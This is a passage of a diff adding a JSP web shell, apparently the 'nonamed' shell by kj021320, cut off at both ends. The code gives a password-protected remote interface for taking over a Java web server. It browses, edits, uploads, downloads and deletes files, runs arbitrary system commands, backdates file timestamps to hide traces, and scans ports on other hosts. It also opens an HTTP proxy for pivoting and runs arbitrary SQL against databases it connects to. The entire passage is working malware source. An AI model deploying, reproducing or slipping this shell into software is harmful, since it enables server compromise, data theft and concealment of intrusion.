+                    "password:<input name=LPass type=password size=15><br><input type=submit value=Login></form></center>");
+        }
+        return;
+    }
+%>
+<html>
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=gb2312">
+<title><%=APP_NAME%></title>
+<style type="text/css">
+ body,td{font-size: 12px;}
+table{T:expression(this.border='1',this.borderColorLight='Black',this.borderColorDark='White');}
+ input,select{font-size:12px;}
+ body{margin-left:0px;margin-top:0px;margin-right:0px;margin-bottom:0px;}
+ td{white-space:nowrap;}
+ a{color:black;text-decoration:none;}
+</style>
+<script>
+    Top=top.address;
+    function downFile(file){
+        Top.Filename.value=file;
+        Top.Action.value="D";
+        Top.submit();
+    }
+    function checkUrl(){
+        top.address.Action.value="F";
+        top.address.submit();
+    }
+    function editFile(file){
+        top.address.Action.value="E";
+        top.address.Filename.value=file;
+        top.address.submit();
+    }
+    function delFile(file){
+        top.address.Action.value="R";
+        top.address.Filename.value=file;
+        top.address.submit();
+    }
+    function reName(file){
+        if((Rname=prompt("rename to?",file))!=""&&Rname!=null){
+            Top.Action.value="N";
+            top.address.Filename.value=file+"|"+Rname;
+            Top.submit();
+        }
+    }
+    function copyFile(file){
+        if((Rname=prompt("copy to?",file))!=""&&Rname!=null){
+            Top.Action.value="P";
+            top.address.Filename.value=file+"|"+Rname;
+            Top.submit();
+        }
+    }
+    function setDate(file){
+        document.write("Change date:<br><form method='post' action='?Action=dateChange'>");
+        document.write("filename:<input name='Filename' type='text' size=60 readonly value='"+file+"'><br>");
+        document.write("Year:<select name='year'>");
+        for(i=1970;i<=2050;i++){
+            document.write("<option value="+i+">"+i+"</option>");
+        }
+        document.write("</select>");
+        document.write("Month:<select name='month'>");
+        for(i=1;i<=12;i++){
+            document.write("<option value="+i+">"+i+"</option>");
+        }
+        document.write("</select>");
+        document.write("Day:<select name='day'>");
+        for(i=1;i<=31;i++){
+            document.write("<option value="+i+">"+i+"</option>");
+        }
+        document.write("</select>");
+        document.write("<input name='Action' type='button' onclick='top.address.Action.value=\"d\";this.form.submit();' value='dateChange'>");
+        document.write("<input name='cancel' onclick='history.back();' type='button' value='Cancel'>");
+    }
+    function zipFile(file){
+        if((zipF=prompt("save to ?",file+"/down.zip"))!=""&&zipF!=null){
+            top.address.Action.value="Z";
+            top.address.FolderPath.value=file;
+            top.address.Filename.value=zipF;
+            top.address.submit();
+        }
+    }
+    function setDataBase(f){
+        driverName=new Array();
+        driverName[0]="com.sybase.jdbc2.jdbc.SybDriver";
+        driverName[1]="com.microsoft.jdbc.sqlserver.SQLServerDriver";
+        driverName[2]="com.mysql.jdbc.Driver";
+        driverName[3]="oracle.jdbc.driver.OracleDriver";
+        driverName[4]="com.ibm.db2.jdbc.app.DB2Driver";
+        driverName[5]="org.postgresql.Driver";
+        conUrl=new Array();
+        conUrl[0]="jdbc:jtds:sybase://host:port/database";
+        conUrl[1]="jdbc:microsoft:sqlserver://host:port;DatabaseName=";
+        conUrl[2]="jdbc:mysql://host:port/database";
+        conUrl[3]="jdbc:oracle:thin:@host:port:database";
+        conUrl[4]="jdbc:db2://host:port/database";
+        conUrl[5]="jdbc:postgresql://host:port/database";
+        
+        f.driver.value=driverName[f.DB.selectedIndex];
+        f.conUrl.value=conUrl[f.DB.selectedIndex];
+    }
+</script>
+</head>
+<body>
+<%
+    String Action=request.getParameter("Action");
+    char action=(Action==null?"0":Action).charAt(0);
+    try{
+        switch(action){
+        //each skill
+            case 'M':mainMenu(out,WEB_SITE);break;
+            case 'F':showFiles(out,encodeChange(request.getParameter("FolderPath")));break;
+            case 'S':showSystemInfo(out);break;
+            case 'L':servletInfo(config,out);break;
+            case 'D':downFile(encodeChange(request.getParameter("Filename")),response);return;
+            case 'E':editFile(encodeChange(request.getParameter("Filename")),out);break;
+            case 'R':deleteFile(encodeChange(request.getParameter("Filename")),out);break;
+            case 'K':saveFile(encodeChange(request.getParameter("filename")),request.getParameter("FileContent").getBytes("ISO-8859-1"),out);break;
+            case 'N':renameFile(encodeChange(request.getParameter("Filename")),out);break;
+            case 'P':copyFile(encodeChange(request.getParameter("Filename")),out);break;
+            case 'd':dateChange(encodeChange(request.getParameter("Filename")),request.getParameter("year"),request.getParameter("month"),request.getParameter("day"),out);break;
+            case 'r':execFile(encodeChange(request.getParameter("execFile")),out);break;
+            case 'Z':zip(encodeChange(request.getParameter("Filename")),encodeChange(request.getParameter("FolderPath")),out);break;
+            case 'U':upfile(request,out,encodeChange(request.getParameter("UPaddress")));break;
+            case 'n':newFolder(out,encodeChange(request.getParameter("Filename")));break;
+            case 'A':reflectAPI(out,encodeChange(request.getParameter("Filename")));break;
+            case 'I':scanPort(out,encodeChange(request.getParameter("IPaddress")),Integer.parseInt(request.getParameter("startPort")),Integer.parseInt(request.getParameter("endPort")));break;
+            case 's':ConnectionDBM(out,encodeChange(request.getParameter("driver")),encodeChange(request.getParameter("conUrl")),encodeChange(request.getParameter("user")),encodeChange(request.getParameter("password")),encodeChange(request.getParameter("run")),encodeChange(request.getParameter("sqlcmd")));break;
+            case 'H':switchProxyService(out);break;
+            case 'i':userInterFaces(out);break;
+            case 'T':systemTools(out);break;
+            default:
+                mainForm(WEB_SITE,out);break;
+        }
+    }catch(Exception e){
+    }
+    out.print("</body></html>");
+    out.close();
+
+%>
+<%!
+//the main framwork
+void mainForm(String web_Site,JspWriter out)throws Exception{
+    out.print("<table width=100% height=100% border=0 bgcolor=menu>");
+    out.print("<tr><td height=30 colspan=2>");
+    out.print("<table width=100% height=25 border=0>");
+    out.print("<form name=address method=post target=FileFrame onSubmit='checkUrl();'>");
+    out.print("<tr><td width=60 align=center>FilePath:</td><td>");
+    out.print("<input name=FolderPath style=width:100% value='"+web_Site+"' onchange='checkUrl();'>");
+    out.print("<input type=hidden name=Action value=F>");
+    out.print("<input type=hidden name=Filename>");
+    out.print("</td><td width=60 align=center><a href='javascript:checkUrl();'>GOtoLink</a>"); 
+    out.print("</td></tr></form></table></td></tr><tr><td width=148>");
+    out.print("<iframe name=Menu src=?Action=M width=100% height=100% frameborder=2 scrolling=yes></iframe></td>");
+    out.print("<td width=600>");
+    out.print("<iframe name=FileFrame src='?Action=F&FolderPath="+web_Site+"' width=100% height=100% frameborder=1 scrolling=yes></iframe>");
+    out.print("</td></tr></table>");
+}
+//menu form to choose
+void mainMenu(JspWriter out,String web_Site)throws Exception{
+    out.println("<table>");
+    out.println("<tr><td bgcolor=Gray><a href=?Action=M>"+ico(58)+"FileOperation(File.class)</a></td></tr>");
+    out.println("<tr><td bgcolor=menu onclick=top.address.FolderPath.value='"+folderReplace(web_Site)+"'><a href='?Action=F&FolderPath="+web_Site+"' target=FileFrame>"+ico(48)+"WEB Folder</a></td></tr>");
+    out.println("<tr><td bgcolor=menu><a href=?Action=S target=FileFrame>"+ico(53)+"SystemInfo(System.class)</a></td></tr>");
+    out.println("<tr><td bgcolor=menu><a href=?Action=L target=FileFrame>"+ico(53)+"ServletInfo</a></td></tr>");
+    out.println("<tr><td bgcolor=menu><a href=?Action=T target=FileFrame>"+ico(53)+"SystemTools</a></td></tr>");
+    out.println("<tr><td bgcolor=menu><a href=?Action=i target=FileFrame>"+ico(57)+"Interfaces</a></td></tr>");
+    out.println("<tr><td bgcolor=menu><a href='http://blog.csdn.net/kj021320' target=FileFrame>About nonamed(kj021320)</a></td></tr>");
+    out.println("</table>");
+}
+//show all files and folders
+void showFiles(JspWriter out,String path)throws Exception{
+    File file=new File(path);
+    long maxSize=0;
+    if(file.isDirectory()&&file.exists()){
+        File[] f=file.listFiles();
+        out.println("<table><tr bgcolor=menu><td>name</td><td>type</td><td>size</td><td>modify date</td><td>readonly</td><td>can write</td><td>hidden</td><td>Action</td></tr>");
+        for(int i=0;i<f.length;i++){
+            maxSize=maxSize+f[i].length();
+            if(f[i].isDirectory())
+                out.println("<tr bgcolor=menu><td><a href=\"javascript:top.address.FolderPath.value='"+folderReplace(f[i].getAbsolutePath())+"/';checkUrl();\">"+ico(48)+f[i].getName()+"</a></td><td> DIR </td><td>"+getSize(f[i].length())+"</td><td>"+new java.util.Date(f[i].lastModified())+"</td><td>"+f[i].canRead()+"</td><td>"+f[i].canWrite()+"</td><td>"+f[i].isHidden()+"</td><td>"+fOperation(true,f[i].getAbsolutePath())+"</td></tr>");
+            else
+                out.println("<tr><td>"+ico(50)+f[i].getName()+"</td><td> file </td><td>"+getSize(f[i].length())+"</td><td>"+new java.util.Date(f[i].lastModified())+"</td><td>"+f[i].canRead()+"</td><td>"+f[i].canWrite()+"</td><td>"+f[i].isHidden()+"</td><td>"+fOperation(false,f[i].getAbsolutePath())+"</td></tr>");
+        }
+        out.println("</table>");
+        out.print("this folder size:"+getSize(maxSize));
+    }
+}
+//show the system information
+void showSystemInfo(JspWriter out)throws Exception{
+    Map map=null;
+    Set set=null;
+    Iterator it=null;
+    
+    /*use for jdk1.5
+    map=System.getenv();
+    set=map.keySet();
+    it=set.iterator();
+    out.print("<hr>System Env info:<ul>");
+    while(it.hasNext()){
+        Object oName=it.next();
+        out.println("<li>"+oName+" [ "+map.get(oName)+" ]");
+    }
+    out.print("</ul>");
+    */
+    
+    map=System.getProperties();
+    set=map.keySet();
+    it=set.iterator();
+    out.println("<hr>System Property info:<ul>");
+        while(it.hasNext()){
+        Object oName=it.next();
+        out.println("<li>"+oName+" [ "+map.get(oName)+" ]");
+    }
+    out.print("</ul><hr>System CPU :");
+    out.print(Runtime.getRuntime().availableProcessors()+" <br>");
+    out.print("the JVM Free Memory :"+getSize(Runtime.getRuntime().freeMemory()));
+    out.print("<br>the JVM Max Memory :"+getSize(Runtime.getRuntime().maxMemory()));
+}
+//show servlet information
+void servletInfo(ServletConfig config,JspWriter out)throws Exception{
+    ServletContext sc=config.getServletContext();
+    out.println("Server info: "+sc.getServerInfo()+"<br>");
+    out.println("ServletContext name: "+sc.getServletContextName()+"<br>");
+    out.println("Major version :"+sc.getMajorVersion()+"<br>");
+    out.println("Minor version :"+sc.getMinorVersion()+"<br>");
+    Enumeration en=sc.getInitParameterNames();
+    String initInfo="init parameter: <br>";
+    out.print(initInfo);
+    while(en.hasMoreElements()){
+        String name=(String)en.nextElement();
+        initInfo="key:"+name+" value:"+sc.getInitParameter(name) +"<br>";
+        out.print(initInfo);
+    }
+   
+}
+//down the server file
+void downFile(String filename,HttpServletResponse res)throws Exception{
+    int w=0;
+    byte[] buffer=new byte[256];
+    byte[] b=(new File(filename)).getName().getBytes("gb2312");
+    String outFile=new String(b,"ISO-8859-1");
+    res.reset();
+    res.setHeader("Content-disposition","attachment;filename=\""+outFile+"\"");
+    ServletOutputStream sos=res.getOutputStream();
+    BufferedInputStream bis=null;
+    try{
+        bis=new BufferedInputStream(new FileInputStream(filename));
+        while((w=bis.read(buffer,0,buffer.length))!=-1){
+            sos.write(buffer,0,w);
+        }
+    }catch(Exception e){
+    }finally{
+        if(bis!=null)bis.close();
+    }
+    sos.flush();
+    res.flushBuffer();
+}
+//delect file
+void deleteFile(String filename,JspWriter out)throws Exception{
+    File f=new File(filename);
+    if(f.exists()){
+        if(f.delete())out.print(filename+"delete success...");
+    }else{
+        out.print("file not find!!");
+    }
+}
+//rename the file
+void renameFile(String filename,JspWriter out)throws Exception{
+    int split=filename.indexOf("|");
+    String newFilename=filename.substring(split+1);
+    filename=filename.substring(0,split);
+    File f=new File(filename);
+    if(f.exists()){
+        if(f.renameTo(new File(newFilename)))out.print(newFilename+" file move success");
+    }else{
+        out.print("file not find!!");
+    }
+}
+//file copy
+void copyFile(String filename,JspWriter out)throws Exception{
+    int split=filename.indexOf("|");
+    String newFilename=filename.substring(split+1);
+    filename=filename.substring(0,split);
+    File f=new File(filename);
+    BufferedInputStream bis=null;
+    BufferedOutputStream bos=null;
+    if(f.exists()){
+        try{
+            bis=new BufferedInputStream(new FileInputStream(filename));
+            bos=new BufferedOutputStream(new FileOutputStream(newFilename));
+            int s=0;
+            while((s=bis.read())!=-1){
+                bos.write(s);
+            }
+        }catch(Exception e){
+            out.print("file copy error");
+        }finally{
+            if(bis!=null)bis.close();
+            if(bos!=null)bos.close();
+        }
+        out.print(newFilename+"file copy success");
+    }else{
+        out.print("file not find!!");
+    }
+}
+//file editor
+void editFile(String filename,JspWriter out)throws IOException{
+    File f=new File(filename);
+    out.print("<form method=post>File Path:");
+    out.print("<input type=text size=80 name=filename value='"+filename+"'>");
+    out.print("<input type=button name=kFile onClick='this.form.action=\"?Action=K\";this.form.submit();' value=KeepFile >");
+    out.print("<input type=button onClick=editFile(this.form.filename.value); value=ReadFile>");
+    out.print("<textarea name=FileContent rows=35 style=width:100%;>");
+    if(f.exists()){
+        try{
+            BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(filename),"Gb2312"));
+            String s="";
+            while((s=br.readLine())!=null){ 
+                out.println(htmlEntity(s)); 
+            }
+        }catch(Exception e){
+            out.print("file edit error");
+        }finally{
+        }
+    }
+    out.print("</textarea></form>");
+}
+//file save
+void saveFile(String filename,byte[] fileContent,JspWriter out)throws IOException{
+    if(filename!=null||fileContent!=null){
+        BufferedOutputStream bos=null;
+        try{
+            bos=new BufferedOutputStream(new FileOutputStream(filename));
+            bos.write(fileContent,0,fileContent.length);
+        }finally{
+            if(bos!=null)bos.close();
+        }
+        out.print(filename+"file save success");
+    }else{
+        out.print("Error");
+    }
+}
+//chang the file modify date
+void dateChange(String filename,String year,String month,String day,JspWriter out)throws IOException{
+    File f=new File(filename);
+    if(f.exists()){
+        Calendar calendar=Calendar.getInstance();
+        calendar.set(Integer.parseInt(year),Integer.parseInt(month),Integer.parseInt(day));
+        if(f.setLastModified(calendar.getTimeInMillis()))
+            out.print(filename+"file date change success");
+        else
+            out.print(filename+"file date change error");
+    }else{
+        out.println("file not find!!!");
+    }
+}
+//run file
+void execFile(String file,JspWriter out)throws Exception{
+    int i=0;
+    Runtime rt=Runtime.getRuntime();
+    Process ps=rt.exec(file);
+    InputStreamReader isr = null;
+    char[] bufferC=new char[1024];
+    try{
+        isr=new InputStreamReader(ps.getInputStream(),"GB2312");
+        out.print("<textarea rows=35 style=width:100%;>");
+        while((i=isr.read(bufferC,0,bufferC.length))!=-1){
+            out.print(htmlEntity(new String(bufferC,0,i)));
+        }
+    }catch(Exception e){
+        out.print("run file error");
+    }finally{
+        if(isr!=null)isr.close();
+    }
+    out.print("</textarea>");
+    systemTools(out);
+}
+//zip zhe folder
+void zip(String zipPath, String srcPath,JspWriter out) throws Exception {
+    FileOutputStream output = null;
+    ZipOutputStream zipOutput = null;
+    try{
+        output = new FileOutputStream(zipPath);
+        zipOutput = new ZipOutputStream(output);
+        zipEntry(zipOutput,srcPath,srcPath,zipPath);
+    }catch(Exception e){
+        out.print("file zip error");
+    }finally{
+        if(zipOutput!=null)zipOutput.close();
+    }
+    out.print("zip ok"+zipPath);
+}
+//add the zip entry
+void zipEntry(ZipOutputStream zipOs, String initPath,String filePath,String zipPath) throws Exception {
+    String entryName = filePath;
+    File f = new File(filePath);
+    if (f.isDirectory()){// check is folder
+        String[] files = f.list();
+        for(int i = 0; i < files.length; i++)
+            zipEntry(zipOs, initPath, filePath + File.separator + files[i],zipPath);
+        return;
+    }
+    String chPh = initPath.substring(initPath.lastIndexOf("/") + 1);// ?????
+    int idx=initPath.lastIndexOf(chPh);
+    if (idx != -1) {
+        entryName = filePath.substring(idx);
+    }
+    ZipEntry entry;
+    entry = new ZipEntry(entryName);
+    File ff = new File(filePath);
+    if(ff.getAbsolutePath().equals(zipPath))return;
+    entry.setSize(ff.length());
+    entry.setTime(ff.lastModified());
+    //the CRC efficacy  
+    entry.setCrc(0);
+    CRC32 crc = new CRC32();
+    crc.reset();
+    zipOs.putNextEntry(entry);
+    int len = 0;
+    byte[] buffer = new byte[2048];
+    int bufferLen = 2048;
+    FileInputStream input =null;
+    try{
+        input = new FileInputStream(filePath);
+        while ((len = input.read(buffer, 0, bufferLen)) != -1) {
+                zipOs.write(buffer, 0, len);
+                crc.update(buffer, 0, len);
+        }
+    }catch(Exception e){
+    }finally{
+        if(input!=null)input.close();
+    }
+    entry.setCrc(crc.getValue());
+}
+//file upload to server
+void upfile(HttpServletRequest request,JspWriter out,String filename)throws Exception{
+        String boundary = request.getContentType().substring(30);//?????
+        ServletInputStream sis=request.getInputStream();
+        BufferedOutputStream bos=null;
+        byte[] buffer = new byte[256];
+        String line=null;
+        for(int i=0;i<5;i++){
+            line=readLine(buffer,sis);
+        }
+        try{
+            bos=new BufferedOutputStream(new FileOutputStream(filename));
+            //read the filedata
+            while(line!=null&&line.indexOf(boundary)==-1){
+                bos.write(buffer,0,line.getBytes().length);
+                line=readLine(buffer,sis);
+            }
+            out.print("upload success!");
+        }catch(Exception e){
+            out.print("upload error");
+        }finally{
+            if(bos!=null)bos.close();
+        }
+}
+String readLine(byte[] lineByte,ServletInputStream servletInputstream){
+    try{
+        int len=0;
+        len=servletInputstream.readLine(lineByte,0,lineByte.length);
+        if(len == -1){
+                return null;
+        }else{
+        return new String(lineByte,0,len);
+        }
+    }catch(Exception _ex){
+        return null;
+    }
+}
+//create folder
+void newFolder(JspWriter out,String foldername)throws Exception{
+    File f=new File(foldername);
+    if(f.mkdirs()){
+        out.print("the folder create success!");
+    }else{
+        out.print("the folder create error");
+    }
+}
+//reflect java API classes
+void reflectAPI(JspWriter out,String className)throws Exception{
+    Class cls=Class.forName(className);
+    String constructor="";
+    String ifString="";
+    Class[] interfaces=cls.getInterfaces();
+    String supperClass=cls.getSuperclass().toString();
+    Constructor[] c=cls.getDeclaredConstructors();
+    Field[] f=cls.getDeclaredFields();
+    Method[] m=cls.getDeclaredMethods();
+    
+    for(int i=0;i<interfaces.length;i++){
+        ifString=ifString+interfaces[i].getName()+",";
+    }
+    out.print("<strong>"+Modifier.toString(cls.getModifiers())+"</strong> "+cls+"<br><strong>extends</strong> "+supperClass+" <strong><br>implemets</strong> "+ifString);
+  
+    out.print("<br>{<br><EM>Constructor:</EM><br>");
+    for(int i=0;i<c.length;i++)
+        out.print("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"+c[i]+"<br>");
+    out.print("<EM>Field:</EM><br>");
+    for(int i=0;i<f.length;i++)
+        out.print("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"+f[i]+"<br>");
+    out.print("<EM>Function:</EM><br>");
+    for(int i=0;i<m.length;i++)
+        out.print("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"+m[i]+"<br>");
+    out.print("<br>}");
+}
+//scan the remote server port
+void scanPort(JspWriter out,String strAddress,int startPort,int endPort)throws Exception{
+    if(endPort<startPort||startPort<=0||startPort>65535||endPort>65535||endPort<=0){
+        out.print("port setup error");
+        return;
+    }
+    InetAddress ia=InetAddress.getByName(strAddress);
+    for(int p=startPort;p<=endPort;p+=15){
+        (new ScanPort(ia,p,p+14,out)).start();
+    }
+    Thread.sleep((int)(endPort/startPort)*5000);
+}//scan port class
+class ScanPort extends Thread{
+    int startPort;
+    int endPort;
+    InetAddress address;
+    javax.servlet.jsp.JspWriter out;
+    public ScanPort(InetAddress address,int startPort,int endPort,JspWriter out){
+        this.address=address;
+        this.startPort=startPort;
+        this.endPort=endPort;
+        this.out=out;
+    }
+    public void run(){
+       Socket s=null;
+       for(int port=startPort;port<=endPort;port++){
+           try{
+               s=new Socket(address,port);
+               out.println("port "+port+" is Open<br>");
+           }
+           catch(IOException e){
+           }finally{
+                try{s.close();}catch(Exception e){}
+           }
+       }
+    }
+}
+public void switchProxyService(JspWriter out)throws Exception{
+ if(openHttpProxy=!openHttpProxy){//open the proxy
+  new RunProxyService(portListen).start();
+  out.print("Proxy running");
+ }else{
+  out.print("Proxy closed");
+ }
+}
+//open httpProxy service
+public class RunProxyService extends Thread{
+ int port;
+ public RunProxyService(int port){
+  this.port=port;
+ }
+ public void run(){
+  try {
+   ServerSocket ss=new ServerSocket(5000);
+   while(true){
+    if(openHttpProxy){
+     new HttpProxy(ss.accept()).start();
+    }else{
+     break;
+    }
+   }
+   ss.close();
+  } catch (IOException e) {
+  }
+ }
+}
+//HttpProxy class
+public class HttpProxy extends Thread{
+ private Socket s;
+ public int timeOut=10000;
+ public HttpProxy(Socket s){
+  this.s=s;
+ }
+ public HttpProxy(Socket s,int timeOut){
+  this.s=s;
+  this.timeOut=timeOut;//set the connection timeout
+ }
+ public void run(){
+  byte[] bit=new byte[1024];
+  int readBit=0;
+  int size=0;
+  String returnAddress=null;//return to the address
+  int returnPort = 0; //return to the port
+  String sendHostName=null;
+  int sendPort=0;
+  Socket sendSocket=null;
+  OutputStream os=null;
+  InputStream is=null;
+  try{
+   int split=0;
+   
+   is=s.getInputStream();
+   //get the http head information
+   if((size=is.read(bit, 0, bit.length))==-1)return;
+   
+   String httpHead=new String(bit,0,size);
+   split=httpHead.indexOf("\nHost: ")+7;
+   sendHostName=httpHead.substring(split, httpHead.indexOf("\n", split));
+   //get the hostname and port
+   if((split=sendHostName.indexOf(':'))!=-1){
+    sendPort=Integer.parseInt(sendHostName.substring(split+1).trim());
+    sendHostName=sendHostName.substring(0,split);
+    sendSocket=new Socket(sendHostName.trim(),sendPort);
+   }else{
+    sendSocket=new Socket(sendHostName.trim(),80);
+   }
+   sendSocket.setSoTimeout(timeOut);
+   //send user headhttp
+   os=sendSocket.getOutputStream();
+   os.write(httpHead.getBytes());
+   //send user datas
+   if(size==bit.length)
+   while((size=is.read(bit, 0, bit.length))!=-1){
+    os.write(bit,0 , size);
+   }
+   os.flush();
+   //get WEBSITE html   and  user browser's output
+   is=sendSocket.getInputStream();
+   os=s.getOutputStream();
+   
+   while((size=is.read(bit, 0, bit.length))!=-1){
+    os.write(bit,0 , size);
+    os.flush();
+   }
+  }catch(SocketException se){
+  } catch (IOException ie) {
+  } catch (Exception e) {
+  }finally{
+   //close the stream
+   if(is!=null){
+    try {
+     is.close();
+    } catch (IOException e) {
+    }
+   }
+   if(os!=null){
+    try {
+     os.close();
+    } catch (IOException e) {
+    }
+   }
+  }
+ }
+}
+//connection to the database
+void ConnectionDBM(JspWriter out,String driver,String url,String userName,String passWord,String sqlAction,String sqlCmd)throws Exception{
+ DBM dbm=new DBM(driver,url,userName,passWord,out);
+ if(sqlAction.equals("LDB")){
+  dbm.lookInfo();
+ }else{
+  dbm.executeSQL(sqlCmd);
+ }
+ dbm.closeAll();
+}
+//database manager class
+class DBM{
+    private JspWriter out;
+    private Connection con;
+    private Statement stmt;
+    private ResultSet rs;
+    public DBM(String driverName,String url,String userName,String passWord,JspWriter out)throws Exception{
+        Class.forName(driverName); 
+        this.out=out;
+        con=DriverManager.getConnection(url,userName,passWord);
+    }
+    public void lookInfo()throws Exception{
+     DatabaseMetaData dbmd=con.getMetaData();
+     String tableType=null;
+     out.print("<strong>DataBaseInfo</strong><table>");
+     out.print("<tr><td>DataBaseName:</td><td>"+dbmd.getDatabaseProductName()+"</td></tr>");
+     out.print("<tr><td>DataBaseVersion:</td><td>"+dbmd.getDatabaseProductVersion()+"</td></tr>");
+     out.print("<tr><td>the Numeric Function:</td><td>"+dbmd.getNumericFunctions()+"</td></tr>");
+     out.print("<tr><td>the String Function:</td><td>"+dbmd.getStringFunctions()+"</td></tr>");
+     out.print("<tr><td>the TimeDate Function:</td><td>"+dbmd.getTimeDateFunctions()+"</td></tr>");
+     out.print("<tr><td>the System Function:</td><td>"+dbmd.getSystemFunctions()+"</td></tr>");
+     out.print("</table>");
+     out.print("<strong>ProcedureInfo</strong><table>");
+     try{
+      getProcedureDetail(dbmd.getProcedures(null,null,null));
+     }catch(Exception proE){}
+     
+     //show  all the tables
+     try{
+      rs=dbmd.getTables(null,null,null,null);
+     }catch(Exception tabE){}
+     out.print("<strong>DataBase Tables Info</strong><br>");
+     while(rs.next()){
+      tableType=rs.getString(4);
+      out.print("<strong>TableName:</strong>"+rs.getString(3)+" <strong>Type:</strong>"+tableType+"<br>");
+      if(tableType.indexOf("VIEW")>=0||tableType.indexOf("TABLE")>=0){
+       try{
+        getTableDetail(dbmd.getColumns(null,null,rs.getString(3),null));
+       }catch(Exception columnE){}
+      }
+     }
+     this.closeAll();
+    }
+    //show the column information
+    private void getTableDetail(ResultSet tableRs)throws Exception{
+        out.print("<table border=1><tr><td>COLUMN_NAME</td><td>DATA_TYPE</td><td>TYPE_NAME</td><td>COLUMN_SIZE</td><td>IS_NULLABLE</td><td>CHAR_OCTET_LENGTH</td></tr>");
+        while(tableRs.next()){
+            out.print("<tr><td>"+tableRs.getString(4)+"</td><td>"+tableRs.getInt(5)+"</td><td>"+tableRs.getString(6)+"</td><td>"+tableRs.getInt(7)+"</td><td>"+tableRs.getString(18)+"</td><td>"+tableRs.getInt(16)+"</td></tr>");
+        }
+        out.print("</table>");
+        tableRs.close();
+    }
+    //show all the procedures
+    private void getProcedureDetail(ResultSet procRs)throws Exception{
+     out.print("<table border=1><tr><td>PROCEDURE_NAME</td><td>REMARKS</td><td>PROCEDURE_TYPE</td></tr>");
+     while(procRs.next()){
+      out.print("<tr><td>"+procRs.getString(3)+"</td><td>"+procRs.getString(7)+"</td><td>"+procRs.getShort(8)+"</td></tr>");
+     }
+     out.print("</table>");
+     procRs.close();
+    }
+    //run the sql command
+    public void executeSQL(String sqlCmd)throws Exception{
+     stmt=con.createStatement();
+     if(sqlCmd.trim().toLowerCase().startsWith("select")){
+      rs=stmt.executeQuery(sqlCmd);
+      ResultSetMetaData rsmd=rs.getMetaData();
+      int ColumnCount=rsmd.getColumnCount();
+      out.print("<table border=1><tr>");
+      for(int i=1;i<=ColumnCount;i++){
+       out.print("<td>"+rsmd.getColumnName(i)+"</td>");
+      }
+      out.print("</tr>");
+      while(rs.next()){
+       out.print("</tr>");
+          for(int i=1;i<=ColumnCount;i++){
+           out.print("<td>"+rs.getString(i)+"</td>");
+          }
+          out.print("</tr>");
+      }
+     }else{
+      stmt.executeUpdate(sqlCmd);
+      out.print("execute success");
+     }
+     
+     
+    }
+    //close all the resource
+    public void closeAll()throws SQLException{
+        try{
+            if(rs!=null)rs.close();
+        }catch(Exception e){
+        }
+        try{
+            if(stmt!=null)stmt.close();
+        }catch(Exception e){
+        }
+        try{
+         if(con!=null)con.close();
+        }catch(Exception e){
+        }
+    }
+}
+//the other tools
+void systemTools(JspWriter out)throws Exception{
+    out.print("<table border=1>");
+    out.print("<tr><form method=post action='?Action=run'><td bordercolorlight=Black bgcolor=menu>System class run</td>");
+    out.print("<td colspan=2>filepath:<input name=execFile size=75 type=text title='example d:\\cmd.exe /c dir c:'></td><td><input name=go type=submit value=run></td></form></tr>");
+    out.print("<tr><form method=post enctype=\"multipart/form-data\" action='?Action=Upfile'><td bordercolorlight=Black bgcolor=menu>file upload</td>");
+    out.print("<td colspan=2>file:<input name=file type=file>up to file<input title='d:\\1.txt' name=UPaddress size=35 type=text></td><td><input name=up onclick=\"this.form.action+='&UPaddress='+this.form.UPaddress.value;\" type=submit value=upl></td></form></tr>");
+    out.print("<tr><form method=post action='?Action=EditFile'><td bordercolorlight=Black bgcolor=menu>new file</td><td colspan=2>file full name:<input name=Filename type=text size=50></td><td><input name=submit type=submit value=new></td>");
+    out.print("</form></tr>");
+    out.print("<tr><form method=post action='?Action=newFolder'><td bordercolorlight=Black bgcolor=menu>Create folder</td><td colspan=2>folder fullname:<input name=Filename type=text size=50></td><td><input name=submit type=submit value=new></td>");
+    out.print("</form></tr>");
+    out.print("<tr><form method=post action='?Action=APIreflect'><td bordercolorlight=Black bgcolor=menu>Reflect API</td><td colspan=2>Class Name:<input name=Filename title=java.lang.String type=text size=50></td><td><input name=submit type=submit value=ref></td>");
+    out.print("</form></tr>");
+    out.print("<tr><form method=post action='?Action=IPscan'><td bordercolorlight=Black bgcolor=menu>Scan Port</td><td>IP:<input name=IPaddress type=text size=20></td><td>Start Port:<input name=startPort title=1-65535 type=text size=5>End Port:<input name=endPort title=1-65535 type=text size=5></td><td><input name=submit type=submit value=sca></td>");
+    out.print("</form></tr>");
+    out.print("<tr><form method=post action='?Action=sql'>");
+    out.print("<td bordercolorlight=Black bgcolor=menu>DBM");
+    out.print("<select name=DB onChange='setDataBase(this.form);'><option>Sybase</option><option>Mssql</option><option>Mysql</option><option>Oracle</option><option>DB2</option><option>PostgreSQL</option></select></td><td>");
+    out.print("Driver:<input name=driver type=text>URL:<input name=conUrl type=text>user:<input name=user type=text size=3>password:<input name=password type=text size=3></td>");
+    out.print("<td>SqlCmd:<input type=text name=sqlcmd title='select * from admin'><input name=run type=submit value=Exec></td>");
+    out.print("<td><input name=run type=submit value=LDB></td>");
+    out.print("</form></tr>");
+    if(!openHttpProxy){
+     out.print("<tr><td><a href='?Action=HttpProxy' target=FileFrame>OpenTheHttpProxy</a></td></tr>");
+    }else{
+     out.print("<tr><td><a href='?Action=HttpProxy' target=FileFrame>CloseTheHttpProxy</a></td></tr>");
+    }
+    out.print("</table>");
+}
+//user interfaces==========================//
+void userInterFaces(JspWriter out)throws Exception{
+ out.print("if u want to add an function ,u can coding in 'userInterFaces'function");
+ 
+}
+//=========================================//
+%>
+
+ 
+
+
+<%!
+String encodeChange(String str)throws Exception{
+    if(str==null)
+        return null;
+    else
+        return new String(str.getBytes("ISO-8859-1"),"gb2312");
+}
+String folderReplace(String folder){
+    return folder.replace('\\','/');
+}
+String fOperation(boolean f,String file){
+    if(f)
+        return "<a href=\"javascript:delFile('"+folderReplace(file)+"')\">Delete</a> <a href=\"javascript:reName('"+folderReplace(file)+"')\">Rename</a> <a href=\"javascript:setDate('"+folderReplace(file)+"')\">setDate</a> <a href=\"javascript:zipFile('"+folderReplace(file)+"')\">Zip</a>";
+    else
